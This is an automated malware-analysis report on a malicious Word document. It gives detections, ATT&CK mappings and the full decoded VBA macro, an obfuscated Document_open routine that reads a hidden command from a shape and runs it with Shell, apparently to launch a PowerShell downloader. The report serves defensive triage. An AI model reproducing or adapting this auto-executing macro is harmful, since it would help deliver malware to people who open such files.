MALICIOUS
272
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The macro utilizes a Shell() call and references cmd.exe and PowerShell, indicating an attempt to execute arbitrary commands. The obfuscated command line suggests the execution of a secondary payload, likely a downloader.
Heuristics 9
-
ClamAV: Doc.Malware.Generic-6774449-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6774449-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
End Select FtwhjPq = Array(hiVNVLv, KLAVpY, GKEbDmF, Interaction.Shell(sEjRuJQiwTR, YlMXKBAfFO), qKtzWspp) Select Case SNnaZrTmLHiHUY -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9695 bytes |
SHA-256: 3fbf482cbb2dc66e86c9325705827acb199d7c61d407a5191c16f173836c2e35 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
217 of 259 identifiers look randomly generated (e.g. 'KVAZbOhGkhrQLjishEwKrFnV') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "KatBHriqA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
Select Case EfzzTlQZzBMMktzrwGFK
Case 302985658
QIstfUNWUqiDVh = 292571205
LHnwtzHrASulJYSolC = 99715709
EZFvMcjVdjYPzcvwXvHSBBt = ChrB(87375796 / ChrB(167004301))
NwYtSSSBPlBrmRQmOTt = mjdTRpvwpCjsWlPkzjOF
Case 324156529
MJzfJqBPnZTuojSFccXVLNEI = 141838337
BfoiFnhpUTVmfE = 308291839
PHYcwiRrHlibmzEoJIo = ChrB(144101470 / ChrB(172414226))
UfMzMzjqzSbkzzj = 299235113
End Select
Select Case uGwHAXwXTzhoJFPAhrzj
Case 178087394
jOfVWJzUkrSzjDdMQEs = 94324861
aPwYCCBuwkQCWXkci = 8196952
XzPqVKYMXUavnMHIwjwUGw = ChrB(170551761 / ChrB(247474683))
CzKjskmDDqRLYcO = piZXpdpOOlvhhiYZdkTM
Case 88957913
ikorkVpzZEipQUANRYHv = 113958848
pEWURshoICQJzpj = 325493894
TZRMqzrREYQSuFRPXvkVPDw = ChrB(107467911 / ChrB(244416707))
fYHULiUjnWAuwEiCNTQWNwzu = 186897929
End Select
Select Case CqWjOCvTYSYPziwtiww
Case 262999763
OjkTddIGcBuPQBpjj = 88807945
wAUfRzwKnrsGhkLoHlN = 246845942
nNvQdAicGKvjWrNtETU = ChrB(201888119 / ChrB(119606277))
PkuNiFNiwVbBJnZOoz = ijjwXLtzuDSsGGSzL
Case 145497373
VcOYMZHVhaTpfVOjo = 229686226
XClHSffcVurpOsXdnUITWQ = 276321706
XbNnXsXiOXwNjVvt = ChrB(215813596 / ChrB(324962136))
aqkFzHrbPfPQHMakrRsFcW = 83218094
End Select
Select Case WBNZLPNajBIlhUnzhULqcGLi
Case 229906709
QiXQOEDnhZaTzoQ = 232642300
CoLbWccJIlOUPqiqEwiD = 120150696
EhumOYOXWataIuXftGuHGS = ChrB(269177929 / ChrB(119361431))
jwdtqljNPjihkOEvk = oboijSYEXIKjmscUi
Case 183742536
djoNNtKtwJsqMVCAqdAMK = 140114537
NXCizlFPjcKGizOboZZav = 207311510
wKjslrdPaIvbpKKNH = ChrB(291626007 / ChrB(300755074))
NBOUBbBLnkvpiFE = 157875276
End Select
Select Case qdGzvoGfpGBSIcMS
Case 309956009
XVlTJBdhGDONwRLvO = 254393417
XLofVkzvZcaBHHkMUZWTFTNh = 20513322
bIjHMNZTXFiqQiKFE = ChrB(37989858 / ChrB(213147658))
GGNErVrStDwHbE = rLSPMcojfiiJoJz
Case 99855011
BBKVviPqVGaUHbO = 73635738
TtmqTZSXhaNMDJtoqFa = 306615690
vhCYrVNOYCPwNpFcRhcswN = ChrB(27491890 / ChrB(18724386))
SwjjRVoQmXMkRcDEIJXz = 94764692
End Select
Set UYFNjwnYZ = KatBHriqA.Shapes(iLShBW + "sqicjuu" + wwPrJ).TextFrame
Select Case pHtYqjLtkJJvzjb
Case 182326675
HhYHiRYFQwABRiaFWzajF = 274545582
JnUkjRFrHHmfjpALq = 136857175
akKsTfjpciAvfROPTJ = ChrB(213325854 / ChrB(271443232))
KHttiwqPWlkLmPizvAFAbd = GMHOUajCJfiPcRw
Case 268314099
sZGzQjsBfQYIbpMhzmhWk = 142829940
pjajHAGhwMXHCXLqcOMoKH = 297746231
qSidfQRwWkQNpDlBZicwD = ChrB(220856429 / ChrB(68532068))
nvEIXjihqsppRcCf = 305400112
End Select
Select Case tnSTkBuLXZEMibRvjuBMP
Case 139868938
ohfMYDjijjNqJNcRbBjfQpSw = 244013638
GSzLUSYodmFpWI = 282899114
VfUlHiGcaKipizOibYwNiXLv = ChrB(117297368 / ChrB(140401773))
qLmfXoUUnczsYMWlKjiGi = WNwMdRwUYTmwQRofKBN
Case 205249475
GbjXBImBLjPESoYjLLD = 142608249
DfFZwFwiZhszzQlSpb = 58337930
SMkXuwcQwzpJJIDw = ChrB(174168355 / ChrB(325378365))
CpWmCWFUYmOVjvJ = 425149
End Select
Select Case DQNjqVZDvvlVpjAozaPjOF
Case 82920244
PazshOAtZOEvoLblzF = 311629366
ZRZzLIWDzHXzEpRQX = 218348860
jvsvbcEAnzijJKuzzA = ChrB(330320036 / ChrB(219330194))
swvRrGrwuKNSjOWhVzW = HiESaNnJsTPZzzo
Case 335059556
dkVMCtoQOavYPbDbaRJscqdT = 227569234
auoSmaXlrMBtFpP = 16497718
nrkcrMwZfiGTnHBi = ChrB(317948042 / ChrB(123141848))
cvoUAikqajLUcadqczdiipt = 41023947
End Select
Select Case DJjSEifhOHEkzYAS
Case 216068744
wKzMNlQNYfAwMaoOODGtw = 192285079
RnDfCmVkOwIMiNqwvBqGzhRu = 197735308
kJwLnlVNiZKGObDvlzENGBYH = ChrB(77062413 / ChrB(290354924))
XwjVIBGBLnDLWrU = RmonPCEwTqQqjlpzvjzR
Case 336745060
BFIZrHimiWlWHV = 151041559
pUrmBSkQSazDQqt = 20178989
MkjfqLzOhIuEMiUcqqdZ = ChrB(80536772 / ChrB(16269359))
UsHRJfVrciquknZzIuYTJ = 278668537
End Select
Select Case GNibNRBllmZvoajpmKnPRzA
Case 254644916
kzbRNXswaSSoIzUAvnwm = 235094167
zhMKvMwZINrwcTaUYPjwOHQB = 198596046
TPVKDzsowtFCbjzA = ChrB(69137988 / ChrB(37165150))
KVAZbOhGkhrQLjishEwKrFnV = OVozzOzKDUsSptvWtHHG
Case 191394453
WsnSwMvFEhftNtsGlTuFHMq = 172289972
KCowzfPDUzwLjSkPwPKnwjC = 196104398
WoLXmKCNblJHHGCQqsuwuF = ChrB(6747448 / ChrB(65581983))
IwjmviAKLbrDjhptwFjaHrJ = 54496962
End Select
sEjRuJQiwTR = UYFNjwnYZ.ContainingRange + HhrRnBjd + ajHJzv + UjiRn + MKKFC + pqscTK + zEbXX + RKvizJ + CfvRTSz + wKqQQUb + LKGdi + uRXVIaG + pzYtki + BYMiIAqT
Select Case jAIlFZTQiTWbIw
Case 303510966
zmjsoSownMJZAXK = 305096374
MtFEHjrOlQQlhhUDuFZwj = 90335172
MLztPtPKJbuwCoDqG = ChrB(292375651 / ChrB(195224360))
BYLGipWGSkwzwb = tJmbUVFGJnlSOqPTFFKPozr
Case 95165351
XJsZfwwbwKjTQJhvRBT = 298122397
HQCQqrnMEuSYBwMNhd = 280241664
rSjjApwdTWzYVDQtqIpEKP = ChrB(287610528 / ChrB(106244597))
uPMVikXcGfojTQBu = 65070697
End Select
Select Case zKbKBGuWwoZEJAjAbb
Case 32792983
wBOHEFZbqElTNpYhM = 344208
QPzVDsatLiiPBwzXwvTFvjTf = 300472905
FrTbwobcoBwjLP = ChrB(196905285 / ChrB(82696763))
wIpkVPSclsuDjwSbA = jakjtnZKwZPkDbiSWXESkc
Case 7269036
MwjYFEjEKdumdQPBLKTsMBoT = 138459047
ZvXiBHZlTzHAFrsKZ = 175611557
woGHCHZIImLHNDoflhcb = ChrB(261371211 / ChrB(87878369))
wRuKFbABbOmYbTnVacwQzIq = 302489075
End Select
Select Case QaFlwnNLRGYahDbhDEDKMLwH
Case 99461615
cQWKrlmwDhnjDAXC = 290651975
aVYPZzmqztkEizWmLwp = 50293079
nnjztuTADnKTWjtlN = ChrB(288516685 / ChrB(153415485))
AmtNzDpNRpbNkKnhoPf = SpwGalHRcBwERjO
Case 3091730
WApEGjNMwiMsLwzMRFLqmnN = 318663520
kPrWvBvnnSPqALGiudC = 307877144
RFAszdDJIimtjWTWpAh = ChrB(109699847 / ChrB(36565427))
dhWRuEIsJLBzTKqivXs = 193183989
End Select
Select Case IRJPZwTREAIQvADmDVOH
Case 232329794
ROLFijphBBzXrYndOihv = 241454098
jHiOqCbohGuczuDTS = 257953950
XwHRXJizaHkanuCfEWQp = ChrB(255714183 / ChrB(38375481))
TsdOYtavMtTNQcpK = LDBjzjGizPwwCzp
Case 113139361
nZuuGFzMYjUjmCOMKijEj = 145931801
WfbibwJwdwipQQKF = 325362337
UZAmBLMjkrTGME = ChrB(114055019 / ChrB(82270249))
PibYNOjqkHNwvAYmDMw = 82449979
End Select
Select Case jXHNotbPKBFlmffsYKG
Case 282891040
hNwliiEbtkUBdZ = 60110907
rViAdjDULSlRvH = 215224498
oZBJKbKLXoRRlkJFW = ChrB(268607460 / ChrB(217854902))
bqWzKcZLwmflDCMDXzsPLS = oSmibJjvGarpwCEzhCwP
Case 243848706
fNiXGiWvRdJOiiX = 304216272
CQqYKLNOASALNMDrjnYAEDzZ = 71962091
OjkUabnDwzujVCV = ChrB(56166336 / ChrB(40395521))
VkERGWCrwuuzSROBz = 216484479
End Select
Select Case MnwAHQMJwdzSXUawRpRWK
Case 49909692
JvXoNJAiLvvQhWEh = 89718402
NAjvjiEibLZjfaFb = 257237496
jbzAwzoWbDtbMID = ChrB(53522979 / ChrB(325835547))
dOLsjihoEiPVKGj = wlOMDjHMDBlzwRcXcwwYtrrR
Case 123521706
vJHFtmrNKStkDtH = 336755534
iziqmCrtMILFHuztwozFzI = 333383299
kHKiruERuBJTkQI = ChrB(49034278 / ChrB(104162790))
jijICXwrGEJtrawZ = 41558468
End Select
Select Case KTdRtoOOAOAILn
Case 91158619
IrTFRSplOEDaATmrPvUoI = 286990983
ZIlUjtppwpLIGpC = 254198587
irDoloOhcJtPSZbRitwjwFs = ChrB(167930896 / ChrB(103522429))
loKfBMJdKRoUoUX = HkvZdPkrYwGGsYwdZiCZWw
Case 46793727
GpPJcNFbJMzIdqiVETHF = 41275774
klTLvKRzQKdPTn = 4558619
OKriwjbpzizhVCpBaDF = ChrB(196779335 / ChrB(276693462))
SuJLvnfOXqUdFwObG = 25331237
End Select
Select Case wibEfBiDmKvCHwVDamZN
Case 302188220
iGzPSMcnvCjrMfBLWKjXzn = 12626716
KjFUtRilkIAUEQiRbzOtT = 108785457
pCOQPiWpqFPEiGHtiUwHE = ChrB(206851022 / ChrB(219950166))
GbRvzYIQuwQSfBS = NSJPoMzLTGkZUJj
Case 65649645
HJnMaqSwwJkqpOcBrt = 248372023
SRubGctojwlRGzXrit = 252783718
rSqCPUdrHXdPvoCpPMGw = ChrB(317826249 / ChrB(199345666))
CYSjsqkWzHJizbrL = 247684267
End Select
Const YlMXKBAfFO = 0
Select Case ESFVSWTaABXkPco
Case 272361450
jDYqmLwCCUGLEAPzoo = 133226252
biwsjEjBwSqOkobuTSSGJSQ = 12829640
OwAIlaoUwrwGfJhc = ChrB(308713271 / ChrB(27552668))
iraQZUfWWNjISufRIitNr = uowconIkiOOjXV
Case 266208257
boFESHMijLAsZtBrsbzl = 131567734
fsNljVulXKdcHFHmkmcNwdnQ = 72116205
MXnvYCLfINqjYrounpOwm = ChrB(321083104 / ChrB(231755479))
rKJGzCEwawIWwbl = 174947366
End Select
Select Case GuMAsiQXXhLwrmCw
Case 270577379
HFduNjnQzYQSUY = 220597050
CztZqjfpjGTNICHpGVZskMh = 192812114
cisGFMmOwjDFPMXZ = ChrB(262946599 / ChrB(92615355))
PZHzQbMzwoIqRPM = BmiaujwJSEkqICSw
Case 329542862
OmUkbfsMoaqtlpCwWnF = 257874490
iazfMrVqwWMsrBZs = 110633388
CihsYTZTunKjfqKN = ChrB(210308044 / ChrB(79682046))
FPoXWsDiAtncFFcDFf = 274190602
End Select
FtwhjPq = Array(hiVNVLv, KLAVpY, GKEbDmF, Interaction.Shell(sEjRuJQiwTR, YlMXKBAfFO), qKtzWspp)
Select Case SNnaZrTmLHiHUY
Case 332391987
YIcIAbHHQlQjiZYtW = 122032941
HjhGNqCkMwPcmQ = 233372889
vqtBrFjKnbmIljp = ChrB(246841523 / ChrB(14096174))
rhrBPRwqvIBJdQvVcC = QLBDXSlDuwcJdaQZBNu
Case 178958212
DAKYIizWNQHmJlJpiTi = 194081950
ErSwXjMrtHibANLr = 206245899
onhhiVXUoHjXtLzNw = ChrB(56529878 / ChrB(286587431))
lvlfTIZKIYwwwFupjXJ = 324988979
End Select
Select Case iJjBPrdwWwYEVFmDFJurWd
Case 99016873
tipGNmjMQUCRPthqXjBB = 146518008
LQXrtjhJQAuFHkBWikQMoBCU = 266645949
bEUnbNIuTYjWswfG = ChrB(23413607 / ChrB(11633140))
JlwpAARkJKJOCDhIdp = YhzMQdmMrUhhzAziafOT
Case 251785506
cwkKKhTKoCRZcpMY = 207295343
NoZQcdLNEYGcOVrO = 29298394
cGSFtjfiPYXISCzCGzkMVHww = ChrB(192891038 / ChrB(308657195))
LnwiOlMvYtIusk = 328622738
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.